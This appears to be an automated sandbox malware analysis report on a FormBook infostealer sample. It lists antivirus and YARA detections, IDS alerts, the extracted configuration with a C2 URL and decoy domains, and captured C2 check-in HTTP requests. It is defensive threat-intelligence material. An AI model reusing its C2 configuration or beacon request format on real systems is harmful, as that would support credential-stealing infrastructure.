Analysis Report UOMp9cDcqZ

AV Detection:

Found malware configuration

Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Multi AV Scanner detection for submitted file

Source: UOMp9cDcqZ.exe	Virustotal: Detection: 16%			Perma Link
Source: UOMp9cDcqZ.exe	Metadefender: Detection: 22%			Perma Link
Source: UOMp9cDcqZ.exe	ReversingLabs: Detection: 50%

Yara detected FormBook

Source: Yara match	File source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: UOMp9cDcqZ.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: UOMp9cDcqZ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: UOMp9cDcqZ.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb source: UOMp9cDcqZ.exe
Source:	Binary string: colorcpl.pdbGCTL source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
Source:	Binary string: colorcpl.pdb source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: UOMp9cDcqZ.exe, 00000002.00000003.245683230.0000000001050000.00000004.00000001.sdmp, colorcpl.exe, 0000000F.00000002.494600161.00000000046D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: UOMp9cDcqZ.exe, colorcpl.exe

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		1_2_0E61B6F0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 4x nop then pop edi		2_2_00416282
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Code function: 4x nop then pop ebx		2_2_00406A94
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then pop ebx		15_2_02546A95
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then pop edi		15_2_02556282

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49728 -> 52.58.78.16:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.adultpeace.com/p2io/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.yunlimall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.dmgt4m2g8y2uh.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.thesoulrevitalist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf4qMx2ahmc0&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.newmopeds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.hazard-protection.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 52.58.78.16 52.58.78.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View	ASN Name: BIT-ISLEEquinixJpapanEnterpriseKKJP BIT-ISLEEquinixJpapanEnterpriseKKJP

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=FG8u3oFaRD5TAlzINClu9ACxgqrSnZ6gPOUiGbwcreYFYk5tnmBon+VN21bBg/43M0dy&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.yunlimall.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=QtqXFq7FP4KHNfY3GXms050Yi4WsLwGmbp3RpBBisdkFhqTaD+AYMAmq/Gwss1AnwPhT&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.dmgt4m2g8y2uh.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=ywi4HDlAhD4tPbY4K6H+rd6B6cynTULkanWCLCIOcA07eHcJTX4js3v63TFqYuac8Mmv&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.thesoulrevitalist.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf4qMx2ahmc0&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.newmopeds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf074xZPwGcUa1&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.cleanxcare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?Y8a0dZ=WcJiaxtbpXoyrp727GVLONmwQJizIxitcLbcPZwW7N+bpIkBoEIsPrx61ns7CFIdu3au&1bE03H=2d8HJVh0mNdP HTTP/1.1Host: www.hazard-protection.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: clientconfig.passport.net

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods: GET, POST, PUT, DELETEAccess-Control-Allow-Headers: AuthorizationDate: Fri, 11 Jun 2021 14:58:19 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 6

URLs found in memory or binary data

Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: UOMp9cDcqZ.exe, 00000001.00000002.248963538.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: UOMp9cDcqZ.exe, 00000001.00000003.233796502.0000000005B09000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersU
Source: UOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: UOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comuev
Source: UOMp9cDcqZ.exe, 00000001.00000003.228190439.0000000005B1B000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.c
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: UOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn.
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: UOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/MI
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cr
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/&
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/4
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp//
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/liquI
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/z
Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.coma-d
Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.coms
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: UOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.krN.TTFv
Source: explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.228445833.0000000005B1B000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comn
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
